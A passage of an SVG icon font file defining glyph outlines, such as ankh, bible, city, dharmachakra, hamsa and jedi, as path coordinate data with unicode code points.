d="M157.52 176l18.4805 53.2197l18.4805 -53.2197h-36.9609zM352 192c13.2305 0 24 -10.7695 24 -24s-10.7695 -24 -24 -24s-24 10.7695 -24 24s10.7695 24 24 24zM464 384c26.5 0 48 -21.5 48 -48v-288c0 -26.5 -21.5 -48 -48 -48h-416c-26.5 0 -48 21.5 -48 48v288
c0 26.5 21.5 48 48 48h416zM250.58 96c11 0 18.7197 10.8496 15.1104 21.25l-53.6904 154.62c-3.08789 8.90332 -13.2422 16.1299 -22.666 16.1299h-0.00390625h-26.6602h-0.00390625c-9.41992 0 -19.5742 -7.22168 -22.666 -16.1201l-53.7002 -154.63
c-3.60938 -10.4004 4.11035 -21.25 15.1201 -21.25h16.9404h0.00585938c6.28125 0 13.0527 4.81641 15.1143 10.75l7.37988 21.25h70.29l7.36914 -21.25c2.24023 -6.42969 8.31055 -10.75 15.1201 -10.75h16.9404zM424 112v160c0 8.83984 -7.16016 16 -16 16h-16
c-8.83984 0 -16 -7.16016 -16 -16v-36.4199c-7.54004 2.68945 -15.54 4.41992 -24 4.41992c-39.7002 0 -72 -32.2998 -72 -72s32.2998 -72 72 -72c9.92969 0 19.4004 2.01953 28.0195 5.67969c2.94043 -3.41016 7.13086 -5.67969 11.9805 -5.67969h16
c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="ankh" unicode="&#xf644;" horiz-adv-x="320" 
d="M296 192c13.25 0 24 -10.7402 24 -24v-32c0 -13.25 -10.75 -24 -24 -24h-96v-152c0 -13.25 -10.75 -24 -24 -24h-32c-13.25 0 -24 10.75 -24 24v152h-96c-13.25 0 -24 10.75 -24 24v32c0 13.2598 10.75 24 24 24h44.6201c-21.0801 33.9902 -36.6201 74.3496 -36.6201 112
c0 88.3701 57.3096 144 128 144s128 -55.6299 128 -144c0 -37.6504 -15.54 -78.0098 -36.6201 -112h44.6201zM160 368c-29.6104 0 -48 -24.5195 -48 -64c0 -34.6602 27.1396 -78.1504 48 -100.87c20.8604 22.7305 48 66.21 48 100.87c0 39.4805 -18.3896 64 -48 64z" />
    <glyph glyph-name="bible" unicode="&#xf647;" horiz-adv-x="448" 
d="M448 89.5996c0 -9.59961 -3.2002 -16 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320
c0 54.4004 41.5996 96 96 96h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM144 304v-32c0 -8.83984 7.16016 -16 16 -16h48v-112c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16v112h48c8.83984 0 16 7.16016 16 16v32
c0 8.83984 -7.16016 16 -16 16h-48v48c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-48h-48c-8.83984 0 -16 -7.16016 -16 -16zM380.8 0v64h-284.8c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h284.8z" />
    <glyph glyph-name="business-time" unicode="&#xf64a;" horiz-adv-x="640" 
d="M496 224c79.5898 0 144 -64.4102 144 -144s-64.4102 -144 -144 -144s-144 64.4102 -144 144s64.4102 144 144 144zM560 73.71v12.5801c0 5.33984 -4.37012 9.70996 -9.70996 9.70996h-38.29v54.2803c0 5.33984 -4.37012 9.70996 -9.70996 9.70996h-12.5703
c-5.33984 0 -9.70996 -4.37012 -9.70996 -9.70996v-76.5703c0 -5.33984 4.37012 -9.70996 9.70996 -9.70996h60.5703c5.33984 0 9.70996 4.37012 9.70996 9.70996zM496 256c-37.5303 0 -72.2803 -11.9102 -100.88 -32h-395.12v80c0 25.5996 22.4004 48 48 48h80v48
c0 25.5996 22.4004 48 48 48h160c25.5996 0 48 -22.4004 48 -48v-48h80c25.5996 0 48 -22.4004 48 -48v-48.8096c-5.28027 0.479492 -10.5996 0.80957 -16 0.80957zM320 352v32h-128v-32h128zM326.82 128c-4.33984 -15.2803 -6.82031 -31.3398 -6.82031 -48
c0 -28.8203 7.09961 -55.96 19.4297 -80h-291.43c-25.5996 0 -48 22.4004 -48 48v144h192v-48c0 -8.83984 7.16016 -16 16 -16h118.82z" />
    <glyph glyph-name="city" unicode="&#xf64f;" horiz-adv-x="640" 
d="M616 256c13.25 0 24 -10.7402 24 -24v-264c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32v360c0 13.2598 10.7402 24 24 24h40v80c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-80h64v80c0 8.83984 7.16016 16 16 16h16
c8.83984 0 16 -7.16016 16 -16v-80h64v72c0 13.2598 10.7402 24 24 24h144c13.2598 0 24 -10.7402 24 -24v-168h136zM128 44v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12z
M128 140v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM128 236v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40
c6.62988 0 12 5.37012 12 12zM256 44v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM256 140v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40
c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM256 236v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM416 140v40c0 6.62988 -5.37012 12 -12 12h-40
c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM416 236v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM416 332v40
c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12zM576 44v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40
c6.62988 0 12 5.37012 12 12zM576 140v40c0 6.62988 -5.37012 12 -12 12h-40c-6.62988 0 -12 -5.37012 -12 -12v-40c0 -6.62988 5.37012 -12 12 -12h40c6.62988 0 12 5.37012 12 12z" />
    <glyph glyph-name="comment-dollar" unicode="&#xf651;" 
d="M256 416c141.38 0 256 -93.1201 256 -208s-114.62 -208 -256 -208c-38.4102 0 -74.71 7.07031 -107.4 19.3799c-24.6094 -19.6299 -74.3398 -51.3799 -140.6 -51.3799h-0.00195312c-4.41309 0 -7.99512 3.58203 -7.99512 7.99512
c0 1.76172 0.984375 4.22754 2.19727 5.50488c0.5 0.530273 42.2598 45.4502 54.8193 95.7598c-35.6094 35.7305 -57.0195 81.1807 -57.0195 130.74c0 114.88 114.62 208 256 208zM280 113.56c30.29 3.62012 53.3701 30.9805 49.3203 63.04
c-2.90039 22.96 -20.6602 41.3105 -42.9102 47.6699l-50.0703 14.3008c-3.59961 1.0293 -6.12012 4.35938 -6.12012 8.10938c0 4.64062 3.78027 8.41992 8.44043 8.41992h32.7803h0.0654297c2.94727 0 7.51367 -0.994141 10.1943 -2.21973
c4.7998 -2.20996 10.3701 -1.70996 14.1094 2.03027l17.5205 17.5195c5.26953 5.27051 4.66992 14.2705 -1.5498 18.3799c-9.5 6.27051 -20.3604 10.1104 -31.7803 11.46v17.7305c0 8.83984 -7.16016 16 -16 16h-16c-8.83984 0 -16 -7.16016 -16 -16v-17.5498
c-30.29 -3.62012 -53.3701 -30.9805 -49.3203 -63.0498c2.90039 -22.96 20.6602 -41.3203 42.9102 -47.6699l50.0703 -14.3008c3.59961 -1.0293 6.12012 -4.35938 6.12012 -8.10938c0 -4.64062 -3.78027 -8.41992 -8.44043 -8.41992h-32.7803
c-3.59961 0 -7.0791 0.759766 -10.2598 2.21973c-4.7998 2.20996 -10.3701 1.70996 -14.1094 -2.03027l-17.5205 -17.5195c-5.26953 -5.27051 -4.66992 -14.2705 1.5498 -18.3799c9.5 -6.27051 20.3604 -10.1104 31.7803 -11.46v-17.7305c0 -8.83984 7.16016 -16 16 -16h16
c8.83984 0 16 7.16016 16 16v17.5596z" />
    <glyph glyph-name="comments-dollar" unicode="&#xf653;" horiz-adv-x="576" 
d="M416 256c0 -88.3701 -93.1201 -160 -208 -160c-40.9805 0 -79.0703 9.24023 -111.27 24.9805c-21.8008 -12.7305 -52.1504 -24.9805 -88.7305 -24.9805h-0.00195312c-4.41309 0 -7.99512 3.58203 -7.99512 7.99512c0 1.76172 0.984375 4.22754 2.19727 5.50488
c0.319336 0.339844 22.4102 24.2803 35.7695 54.5195c-23.8398 26.0303 -37.9697 57.7109 -37.9697 91.9805c0 88.3701 93.1201 160 208 160s208 -71.6299 208 -160zM192 160c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16.1201
c23.6201 0.629883 42.6699 20.54 42.6699 45.0703c0 19.9697 -12.9902 37.8096 -31.5801 43.3896l-45 13.5c-5.16016 1.54004 -8.76953 6.78027 -8.76953 12.7295c0 7.27051 5.2998 13.1904 11.7998 13.1904h28.1104c4.55957 0 8.94922 -1.29004 12.8193 -3.71973
c3.24023 -2.03027 7.36035 -1.91016 10.1299 0.729492l11.75 11.21c3.53027 3.37012 3.33008 9.20996 -0.569336 12.1406c-9.10059 6.83984 -20.0801 10.7695 -31.3701 11.3496v16.29c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-16.1201
c-23.6201 -0.629883 -42.6699 -20.5498 -42.6699 -45.0703c0 -19.9697 12.9893 -37.8096 31.5801 -43.3896l45 -13.5c5.15918 -1.54004 8.76953 -6.78027 8.76953 -12.7295c0 -7.27051 -5.2998 -13.1904 -11.7998 -13.1904h-28.1104
c-4.55957 0 -8.9502 1.2998 -12.8193 3.71973c-3.24023 2.03027 -7.36035 1.91016 -10.1309 -0.729492l-11.75 -11.21c-3.5293 -3.37012 -3.3291 -9.20996 0.570312 -12.1406c9.10059 -6.83008 20.0801 -10.7695 31.3701 -11.3496v-16.29zM538.01 36.0098
c13.3604 -30.2598 35.4707 -54.1699 35.7803 -54.5c2.20996 -2.33008 2.82031 -5.72949 1.5498 -8.66992c-1.25 -2.92969 -4.13965 -4.83984 -7.33984 -4.83984c-36.5801 0 -66.9297 12.25 -88.7305 24.9805c-32.1992 -15.7402 -70.2891 -24.9805 -111.27 -24.9805
c-86.2305 0 -160.2 40.3701 -191.73 97.8799c10.4102 -1.11035 20.9502 -1.87988 31.7305 -1.87988c132.34 0 240 86.1299 240 192c0 6.78027 -0.469727 13.4697 -1.33008 20.0703c75.8398 -23.8701 129.33 -81.1299 129.33 -148.07
c0 -34.2695 -14.1299 -65.96 -37.9902 -91.9902z" />
    <glyph glyph-name="cross" unicode="&#xf654;" horiz-adv-x="384" 
d="M352 320c17.6699 0 32 -14.3301 32 -32v-64c0 -17.6699 -14.3301 -32 -32 -32h-96v-224c0 -17.6699 -14.3301 -32 -32 -32h-64c-17.6699 0 -32 14.3301 -32 32v224h-96c-17.6699 0 -32 14.3301 -32 32v64c0 17.6699 14.3301 32 32 32h96v96c0 17.6699 14.3301 32 32 32
h64c17.6699 0 32 -14.3301 32 -32v-96h96z" />
    <glyph glyph-name="dharmachakra" unicode="&#xf655;" 
d="M495 222.94c9.20996 0.569336 17 -6.74023 17.0098 -15.9707v-29.9395c0 -9.23047 -7.79004 -16.5498 -17 -15.9707l-17.2197 1.08008c-5.28027 -39.4795 -20.7998 -75.6299 -43.8604 -105.83l12.9502 -11.4297c6.91992 -6.09961 7.25977 -16.7803 0.730469 -23.3096
l-21.1699 -21.1699c-6.52051 -6.52051 -17.2002 -6.19043 -23.3105 0.729492l-11.4297 12.9502c-30.2002 -23.0703 -66.3506 -38.5898 -105.84 -43.8604l1.08008 -17.2197c0.569336 -9.20996 -6.74023 -17 -15.9707 -17h-29.9395c-9.23047 0 -16.5498 7.79004 -15.9707 17
l1.09082 17.2197c-39.4902 5.28027 -75.6406 20.7998 -105.841 43.8604l-11.4297 -12.9502c-6.09961 -6.91992 -16.7803 -7.25977 -23.3096 -0.729492l-21.1699 21.1699c-6.52051 6.51953 -6.19043 17.1992 0.729492 23.3096l12.9502 11.4297
c-23.0703 30.1904 -38.5898 66.3408 -43.8604 105.83l-17.2197 -1.08008c-9.20996 -0.569336 -17 6.74023 -17 15.9707v29.9395c0 9.23047 7.79004 16.5498 17 15.9707l17.2197 -1.08008c5.28027 39.4893 20.7998 75.6396 43.8604 105.84l-12.9502 11.4297
c-6.91992 6.10059 -7.25977 16.7803 -0.729492 23.3105l21.1699 21.1592c6.51953 6.52051 17.1992 6.19043 23.3096 -0.729492l11.4297 -12.9502c30.1904 23.0703 66.3408 38.5898 105.83 43.8604l-1.08008 17.2197c-0.569336 9.20996 6.74023 17 15.9707 17h29.9395
c9.23047 0 16.5498 -7.79004 15.9707 -17l-1.07031 -17.21c39.4795 -5.28027 75.6299 -20.7998 105.83 -43.8604l11.4297 12.9404c6.10059 6.91992 16.7803 7.25977 23.3105 0.729492l21.1592 -21.1592c6.52051 -6.52051 6.19043 -17.2002 -0.729492 -23.3105
l-12.9502 -11.4297c23.0703 -30.2002 38.5898 -66.3506 43.8604 -105.84zM281.84 349.39l-4.00977 -64.1201c10.2998 -2.40918 19.8896 -6.50977 28.6201 -11.9492l42.6201 48.29c-19.6006 14.1201 -42.4199 23.71 -67.2305 27.7793zM230.16 349.39
c-24.8105 -4.06934 -47.6299 -13.6592 -67.2305 -27.7793l42.6201 -48.29c8.73047 5.42969 18.3301 9.54004 28.6201 11.9492zM126.39 285.06c-14.1201 -19.5996 -23.71 -42.4092 -27.7793 -67.2197l64.1201 -4.00977c2.41992 10.29 6.51953 19.8896 11.96 28.6201z
M98.6104 166.16c4.06934 -24.8105 13.6592 -47.6299 27.7793 -67.2305l48.29 42.6201c-5.42969 8.73047 -9.54004 18.3301 -11.9492 28.6201zM230.16 34.6104l4 64.1201c-10.29 2.41992 -19.8906 6.51953 -28.6201 11.96l-42.6104 -48.3008
c19.6006 -14.1201 42.4199 -23.71 67.2305 -27.7793zM256 160c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM281.84 34.6104c24.8105 4.06934 47.6201 13.6592 67.2197 27.7793l-42.6094 48.3008
c-8.73047 -5.44043 -18.3301 -9.55078 -28.6201 -11.96zM385.61 98.9404c14.1201 19.5898 23.71 42.4092 27.7793 67.2295l-64.1201 4.00977c-2.40918 -10.2998 -6.50977 -19.8896 -11.9492 -28.6201zM349.27 213.83l64.1201 4
c-4.06934 24.8096 -13.6592 47.6299 -27.7793 67.2295l-48.3008 -42.6094c5.44043 -8.73047 9.55078 -18.3301 11.96 -28.6201z" />
    <glyph glyph-name="envelope-open-text" unicode="&#xf658;" 
d="M176 232c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h160c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-160zM160 152v16c0 8.83984 7.16016 16 16 16h160c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16
h-160c-8.83984 0 -16 7.16016 -16 16zM256 30.8701c16.4199 0 32.8398 5.07031 46.8604 15.1895l209.14 151.08v-213.14c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v213.14l209.14 -151.08c14.0205 -10.1299 30.4404 -15.1895 46.8604 -15.1895z
M493.61 285.05c11.6094 -9.09961 18.3896 -23.0303 18.3896 -37.7695v-10.6504l-96 -69.3496v184.72h-320v-184.72l-96 69.3496v10.6504c0.00195312 12.8945 8.24023 29.8154 18.3896 37.7695c8.85059 6.94043 17.2402 13.4805 29.6104 22.8105v44.1396
c0 26.5098 21.4902 48 48 48h77.5498c3.04004 2.2002 5.87012 4.25977 9.04004 6.55957c16.8203 12.2705 50.21 41.79 73.4102 41.4404c23.2002 0.349609 56.5996 -29.1699 73.4102 -41.4404c3.16992 -2.2998 6 -4.35938 9.04004 -6.55957h77.5498
c26.5098 0 48 -21.4902 48 -48v-44.1396c12.3701 -9.34082 20.7598 -15.8701 29.6104 -22.8105z" />
    <glyph glyph-name="folder-minus" unicode="&#xf65d;" 
d="M464 320c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h160l64 -64h192zM368 152v16c0 8.83984 -7.16016 16 -16 16h-192c-8.83984 0 -16 -7.16016 -16 -16v-16
c0 -8.83984 7.16016 -16 16 -16h192c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="folder-plus" unicode="&#xf65e;" 
d="M464 320c26.5098 0 48 -21.4902 48 -48v-224c0 -26.5098 -21.4902 -48 -48 -48h-416c-26.5098 0 -48 21.4902 -48 48v288c0 26.5098 21.4902 48 48 48h160l64 -64h192zM368 152v16c0 8.83984 -7.16016 16 -16 16h-72v72c0 8.83984 -7.16016 16 -16 16h-16
c-8.83984 0 -16 -7.16016 -16 -16v-72h-72c-8.83984 0 -16 -7.16016 -16 -16v-16c0 -8.83984 7.16016 -16 16 -16h72v-72c0 -8.83984 7.16016 -16 16 -16h16c8.83984 0 16 7.16016 16 16v72h72c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="funnel-dollar" unicode="&#xf662;" horiz-adv-x="640" 
d="M433.46 282.06c-83.4102 -20.8896 -145.46 -96.2695 -145.46 -186.06c0 -54.3496 22.7998 -103.38 59.21 -138.35c-10.75 -20.54 -38.3604 -29.21 -59.2197 -13.5703l-79.9902 60c-10.0703 7.55957 -16 19.4102 -16 32v155.92l-182.66 201.93
c-19.9502 19.9502 -5.82031 54.0703 22.4004 54.0703h480.52c28.2207 0 42.3506 -34.1201 22.4004 -54.0703zM480 256c88.3701 0 160 -71.6299 160 -160s-71.6299 -160 -160 -160s-160 71.6299 -160 160s71.6299 160 160 160zM496 16.1201
c23.6299 0.629883 42.6699 20.54 42.6699 45.0703c0 19.9697 -12.9902 37.8096 -31.5801 43.3896l-45 13.5c-5.16016 1.54004 -8.76953 6.78027 -8.76953 12.7295c0 7.27051 5.2998 13.1904 11.7998 13.1904h28.1104c4.55957 0 8.94922 -1.29004 12.8193 -3.71973
c3.24023 -2.03027 7.36035 -1.91016 10.1299 0.729492l11.75 11.21c3.53027 3.37012 3.33008 9.20996 -0.569336 12.1406c-9.10059 6.83984 -20.0801 10.7695 -31.3701 11.3496v16.29c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-16.1201
c-23.6201 -0.629883 -42.6699 -20.5498 -42.6699 -45.0703c0 -19.9697 12.9893 -37.8096 31.5801 -43.3896l45 -13.5c5.15918 -1.54004 8.76953 -6.78027 8.76953 -12.7295c0 -7.27051 -5.2998 -13.1904 -11.7998 -13.1904h-28.1104
c-4.55957 0 -8.9502 1.2998 -12.8193 3.71973c-3.24023 2.03027 -7.36035 1.91016 -10.1309 -0.729492l-11.75 -11.21c-3.5293 -3.37012 -3.3291 -9.20996 0.570312 -12.1406c9.10059 -6.83008 20.0801 -10.7695 31.3701 -11.3496v-16.29c0 -4.41992 3.58008 -8 8 -8h16
c4.41992 0 8 3.58008 8 8v16.1201z" />
    <glyph glyph-name="gopuram" unicode="&#xf664;" 
d="M496 96c8.7998 0 16 -7.2002 16 -16v-128c0 -8.7998 -7.2002 -16 -16 -16h-80v160h-32v128h-32v96h-32v-96h32v-128h32v-160h-80v80c0 8.7998 -7.2002 16 -16 16h-64c-8.7998 0 -16 -7.2002 -16 -16v-80h-80v160h32v128h32v96h-32v-96h-32v-128h-32v-160h-80
c-8.7998 0 -16 7.2002 -16 16v128c0 8.7998 7.2002 16 16 16h16v112c0 8.7998 7.2002 16 16 16h16v80c0 8.7998 7.2002 16 16 16h16v112c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16v-16h64v16c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16v-16h64v16
c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16v-16h64v16c0 8.7998 7.2002 16 16 16s16 -7.2002 16 -16v-112h16c8.7998 0 16 -7.2002 16 -16v-80h16c8.7998 0 16 -7.2002 16 -16v-112h16zM232 272v-48h48v48c0 8.7998 -7.2002 16 -16 16h-16c-8.7998 0 -16 -7.2002 -16 -16z
M288 96v64c0 8.7998 -7.2002 16 -16 16h-32c-8.7998 0 -16 -7.2002 -16 -16v-64h64z" />
    <glyph glyph-name="hamsa" unicode="&#xf665;" 
d="M509.34 140.75c1.46875 -3.37012 2.66016 -9.08984 2.66016 -12.7656c0 -6.95703 -3.85254 -16.7295 -8.59961 -21.8145l-102.681 -110.03c-35.6895 -38.2197 -88.4102 -60.1396 -144.72 -60.1396s-109.03 21.9199 -144.71 60.1396l-102.69 110.03
c-4.74707 5.08496 -8.59961 14.8574 -8.59961 21.8145c0 3.67578 1.19141 9.39551 2.66016 12.7656c5.05957 11.6904 16.5898 19.25 29.3398 19.25h64v208c0 22 18 40 40 40s40 -18 40 -40v-134c0 -5.51953 4.48047 -10 10 -10h20c5.51953 0 10 4.48047 10 10v174
c0 22 18 40 40 40s40 -18 40 -40v-174c0 -5.51953 4.48047 -10 10 -10h20c5.51953 0 10 4.48047 10 10v134c0 22 18 40 40 40s40 -18 40 -40v-208h64c12.75 0 24.2803 -7.55957 29.3398 -19.25zM256 32c53.0195 0 96 64 96 64s-42.9805 64 -96 64s-96 -64 -96 -64
s42.9805 -64 96 -64zM256 128c17.6699 0 32 -14.3301 32 -32s-14.3301 -32 -32 -32s-32 14.3301 -32 32s14.3301 32 32 32z" />
    <glyph glyph-name="haykal" unicode="&#xf666;" 
d="M496.25 245.48c17.54 -2.46094 21.6797 -26.2705 6.04004 -34.6602l-98.1602 -52.6602l74.4805 -83.54c11.8594 -13.29 0.00976562 -34.25 -17.3506 -30.4902l-108.569 23.6504l4.10938 -112.55c0.430664 -11.6504 -8.87012 -19.2207 -18.4102 -19.2207
c-5.15918 0 -10.3896 2.20996 -14.1992 7.18066l-68.1807 88.8994l-68.1797 -88.8994c-3.81055 -4.9707 -9.0498 -7.18066 -14.2002 -7.18066c-9.54004 0 -18.8398 7.57031 -18.4102 19.2207l4.11035 112.55l-108.57 -23.6504
c-1.39941 -0.30957 -2.75977 -0.450195 -4.06934 -0.450195c-15.0107 0 -24.21 18.6807 -13.29 30.9307l74.4795 83.54l-98.1602 52.6592c-15.6494 8.40039 -11.5098 32.21 6.03027 34.6709l110 15.4297l-41.8203 104.34c-6.66016 16.6396 11.6006 32.1797 26.5898 22.6299
l94.04 -59.8896l34.0908 107.189c2.70996 8.55078 10.0293 12.8203 17.3496 12.8203s14.6396 -4.26953 17.3496 -12.8203l34.0908 -107.18l94.04 59.8896c14.9893 9.55078 33.2598 -5.98926 26.5898 -22.6299l-41.8203 -104.34zM338.51 136.32l-35.6094 39.9297
l46.9199 25.1699l-52.5703 7.37988l19.9902 49.8701l-44.9502 -28.6201l-16.29 51.2305l-16.3096 -51.2305l-44.9502 28.6201l19.9902 -49.8701l-52.5703 -7.37988l46.9199 -25.1699l-35.5996 -39.9297l51.8896 11.2998l-1.95996 -53.79l32.5898 42.4902l32.5898 -42.4902
l-1.96973 53.79z" />
    <glyph glyph-name="jedi" unicode="&#xf669;" horiz-adv-x="544" 
d="M479.99 96h39.96c-42.6299 -94.1699 -137.641 -160 -247.98 -160c-4.25977 0 -8.5498 0.0898438 -12.8496 0.290039c-103.97 4.76953 -193.851 69.4795 -235.101 159.71h39.9102l-58.5996 58.5996c-2.57031 12.8809 -4.49023 25.9805 -5.11035 39.4102
c-0.469727 10.0801 -0.129883 20.0703 0.5 29.9902h47.21l-41.3799 41.3799c14.3701 64.7002 52.1006 122.55 107.97 162.07c2.77051 1.95996 5.9707 3 9.27051 3c5.37988 0 10.4297 -2.70996 13.5098 -7.25c3.0498 -4.5 3.64062 -10 1.62012 -15.0898
c-6.53027 -16.4502 -9.83984 -33.7002 -9.83984 -51.2607c0 -45.1191 21.04 -86.5801 57.71 -113.739c4.00977 -2.9707 6.4502 -7.48047 6.69043 -12.3799c0.239258 -4.90039 -1.76074 -9.65039 -5.48047 -13.0107c-26.5498 -23.9795 -41.1699 -56.5 -41.1699 -91.5801
c0 -60.0293 42.9502 -110.279 99.8896 -121.92l2.5 65.2607l-27.1602 -18.4805c-2.96973 -2 -7.40918 -1.7002 -10 0.75c-2.72949 2.61035 -3.30957 6.70996 -1.38965 9.94043l20.1299 33.7695l-42.0693 8.71973c-3.71094 0.75 -6.38086 4.05078 -6.38086 7.83008
c0 3.78027 2.68066 7.08008 6.38086 7.83008l42.0693 8.73047l-20.1094 33.7295c-1.94043 3.27051 -1.36035 7.35059 1.35938 9.94043c2.73047 2.60938 6.86035 2.89941 10 0.779297l30.3906 -20.6592l11.5195 287.97c0.160156 4.29004 3.66992 7.66992 8 7.66992h0.0400391
c4.25293 0 7.81934 -3.44922 7.95996 -7.7002l11.5303 -287.93l30.3896 20.6699c3.03027 2.08984 7.2998 1.75 10 -0.799805c2.71973 -2.60059 3.2998 -6.68066 1.37988 -9.91016l-20.1299 -33.7705l42.0703 -8.72949c3.68945 -0.770508 6.37988 -4.06055 6.37988 -7.83008
c0 -3.78027 -2.67969 -7.08008 -6.37988 -7.83008l-42.0703 -8.71973l20.1104 -33.7305c0.631836 -1.05078 1.14453 -2.89844 1.14453 -4.12402c0 -1.89355 -1.11328 -4.49023 -2.48438 -5.7959c-2.63086 -2.49023 -7.04004 -2.85938 -10.0205 -0.799805l-27.1699 18.4697
l2.5 -65.3398c48.4697 9.40039 87.5703 48.1504 97.3096 96.5c8.78027 43.5605 -5.63965 87.3203 -38.5693 117.07c-3.73047 3.37012 -5.73047 8.10938 -5.49023 13.0303c0.240234 4.89941 2.67969 9.41992 6.7002 12.3994c36.6602 27.1602 57.6895 68.6104 57.6895 113.73
c0 17.5801 -3.30957 34.8496 -9.85938 51.3096c-2.03027 5.09961 -1.44043 10.5996 1.60938 15.0898c3.08008 4.53027 8.12012 7.24023 13.4902 7.24023c3.28027 0 6.48047 -1.03027 9.25 -2.99023c55.4805 -39.2197 93.4102 -97.4795 107.91 -162.27l-41.25 -41.2402
h46.9502c0.370117 -5.75977 1.0498 -11.46 1.0498 -17.2695c0 -17.7402 -1.83984 -35.0605 -5.12988 -51.8604z" />
    <glyph glyph-name="journal-whills" unicode="&#xf66a;" horiz-adv-x="448" 
d="M448 89.5996c0 -9.59961 -3.2002 -16 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320
c0 54.4004 41.5996 96 96 96h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM133.08 303.61c-2.98047 -10.0908 -5.08008 -20.5605 -5.07031 -31.6201c0 -0.520508 0.140625 -0.990234 0.150391 -1.50977l37.1094 -32.4707
c3.33008 -2.89941 3.6709 -7.9502 0.75 -11.2793c-1.5791 -1.81055 -3.7998 -2.73047 -6.01953 -2.73047h-0.0175781c-1.65527 0 -4.00879 0.886719 -5.25195 1.98047l-23.5908 20.6396c11.54 -49.5801 55.7705 -86.6201 108.86 -86.6201s97.3203 37.04 108.87 86.6299
l-23.5898 -20.6396c-1.52051 -1.32031 -3.39062 -1.98047 -5.27051 -1.98047h-0.0146484c-2 0 -4.69043 1.22363 -6.00488 2.73047c-1.09668 1.24707 -1.98633 3.60645 -1.98633 5.2666c0 2.00293 1.22559 4.69727 2.73633 6.0127l37.1094 32.4707
c0.0107422 0.519531 0.150391 0.990234 0.150391 1.50977c0 11.0498 -2.09961 21.5195 -5.07031 31.5996l-21.2598 -21.2598c-1.57031 -1.55957 -3.61035 -2.33984 -5.66016 -2.33984s-4.09961 0.780273 -5.66016 2.33984c-3.11914 3.12012 -3.11914 8.19043 0 11.3105
l26.4199 26.4199c-10 20.8994 -26.2393 37.9795 -46.3691 49.2598c5.97949 -9.73047 9.59961 -21.0703 9.59961 -33.3301c0 -19.96 -9.33008 -37.5703 -23.6602 -49.3096c9.65039 -10.0605 15.6602 -23.6504 15.6602 -38.6904c0 -26.9404 -19.04 -49.4004 -44.3701 -54.7402
l-1.42969 34.2803l12.6797 -8.62012c0.69043 -0.459961 1.46973 -0.689453 2.25 -0.689453c0.980469 0 1.98047 0.369141 2.75 1.08984c1.36035 1.2793 1.63965 3.33984 0.69043 4.94922l-8.54004 14.3105l17.9102 3.71973
c1.85938 0.390625 3.18945 2.03027 3.18945 3.91992c0 1.89062 -1.33008 3.53027 -3.18945 3.91992l-17.9102 3.7207l8.54004 14.3096c0.308594 0.521484 0.55957 1.43652 0.55957 2.04297c0 0.950195 -0.55957 2.25293 -1.25 2.90723
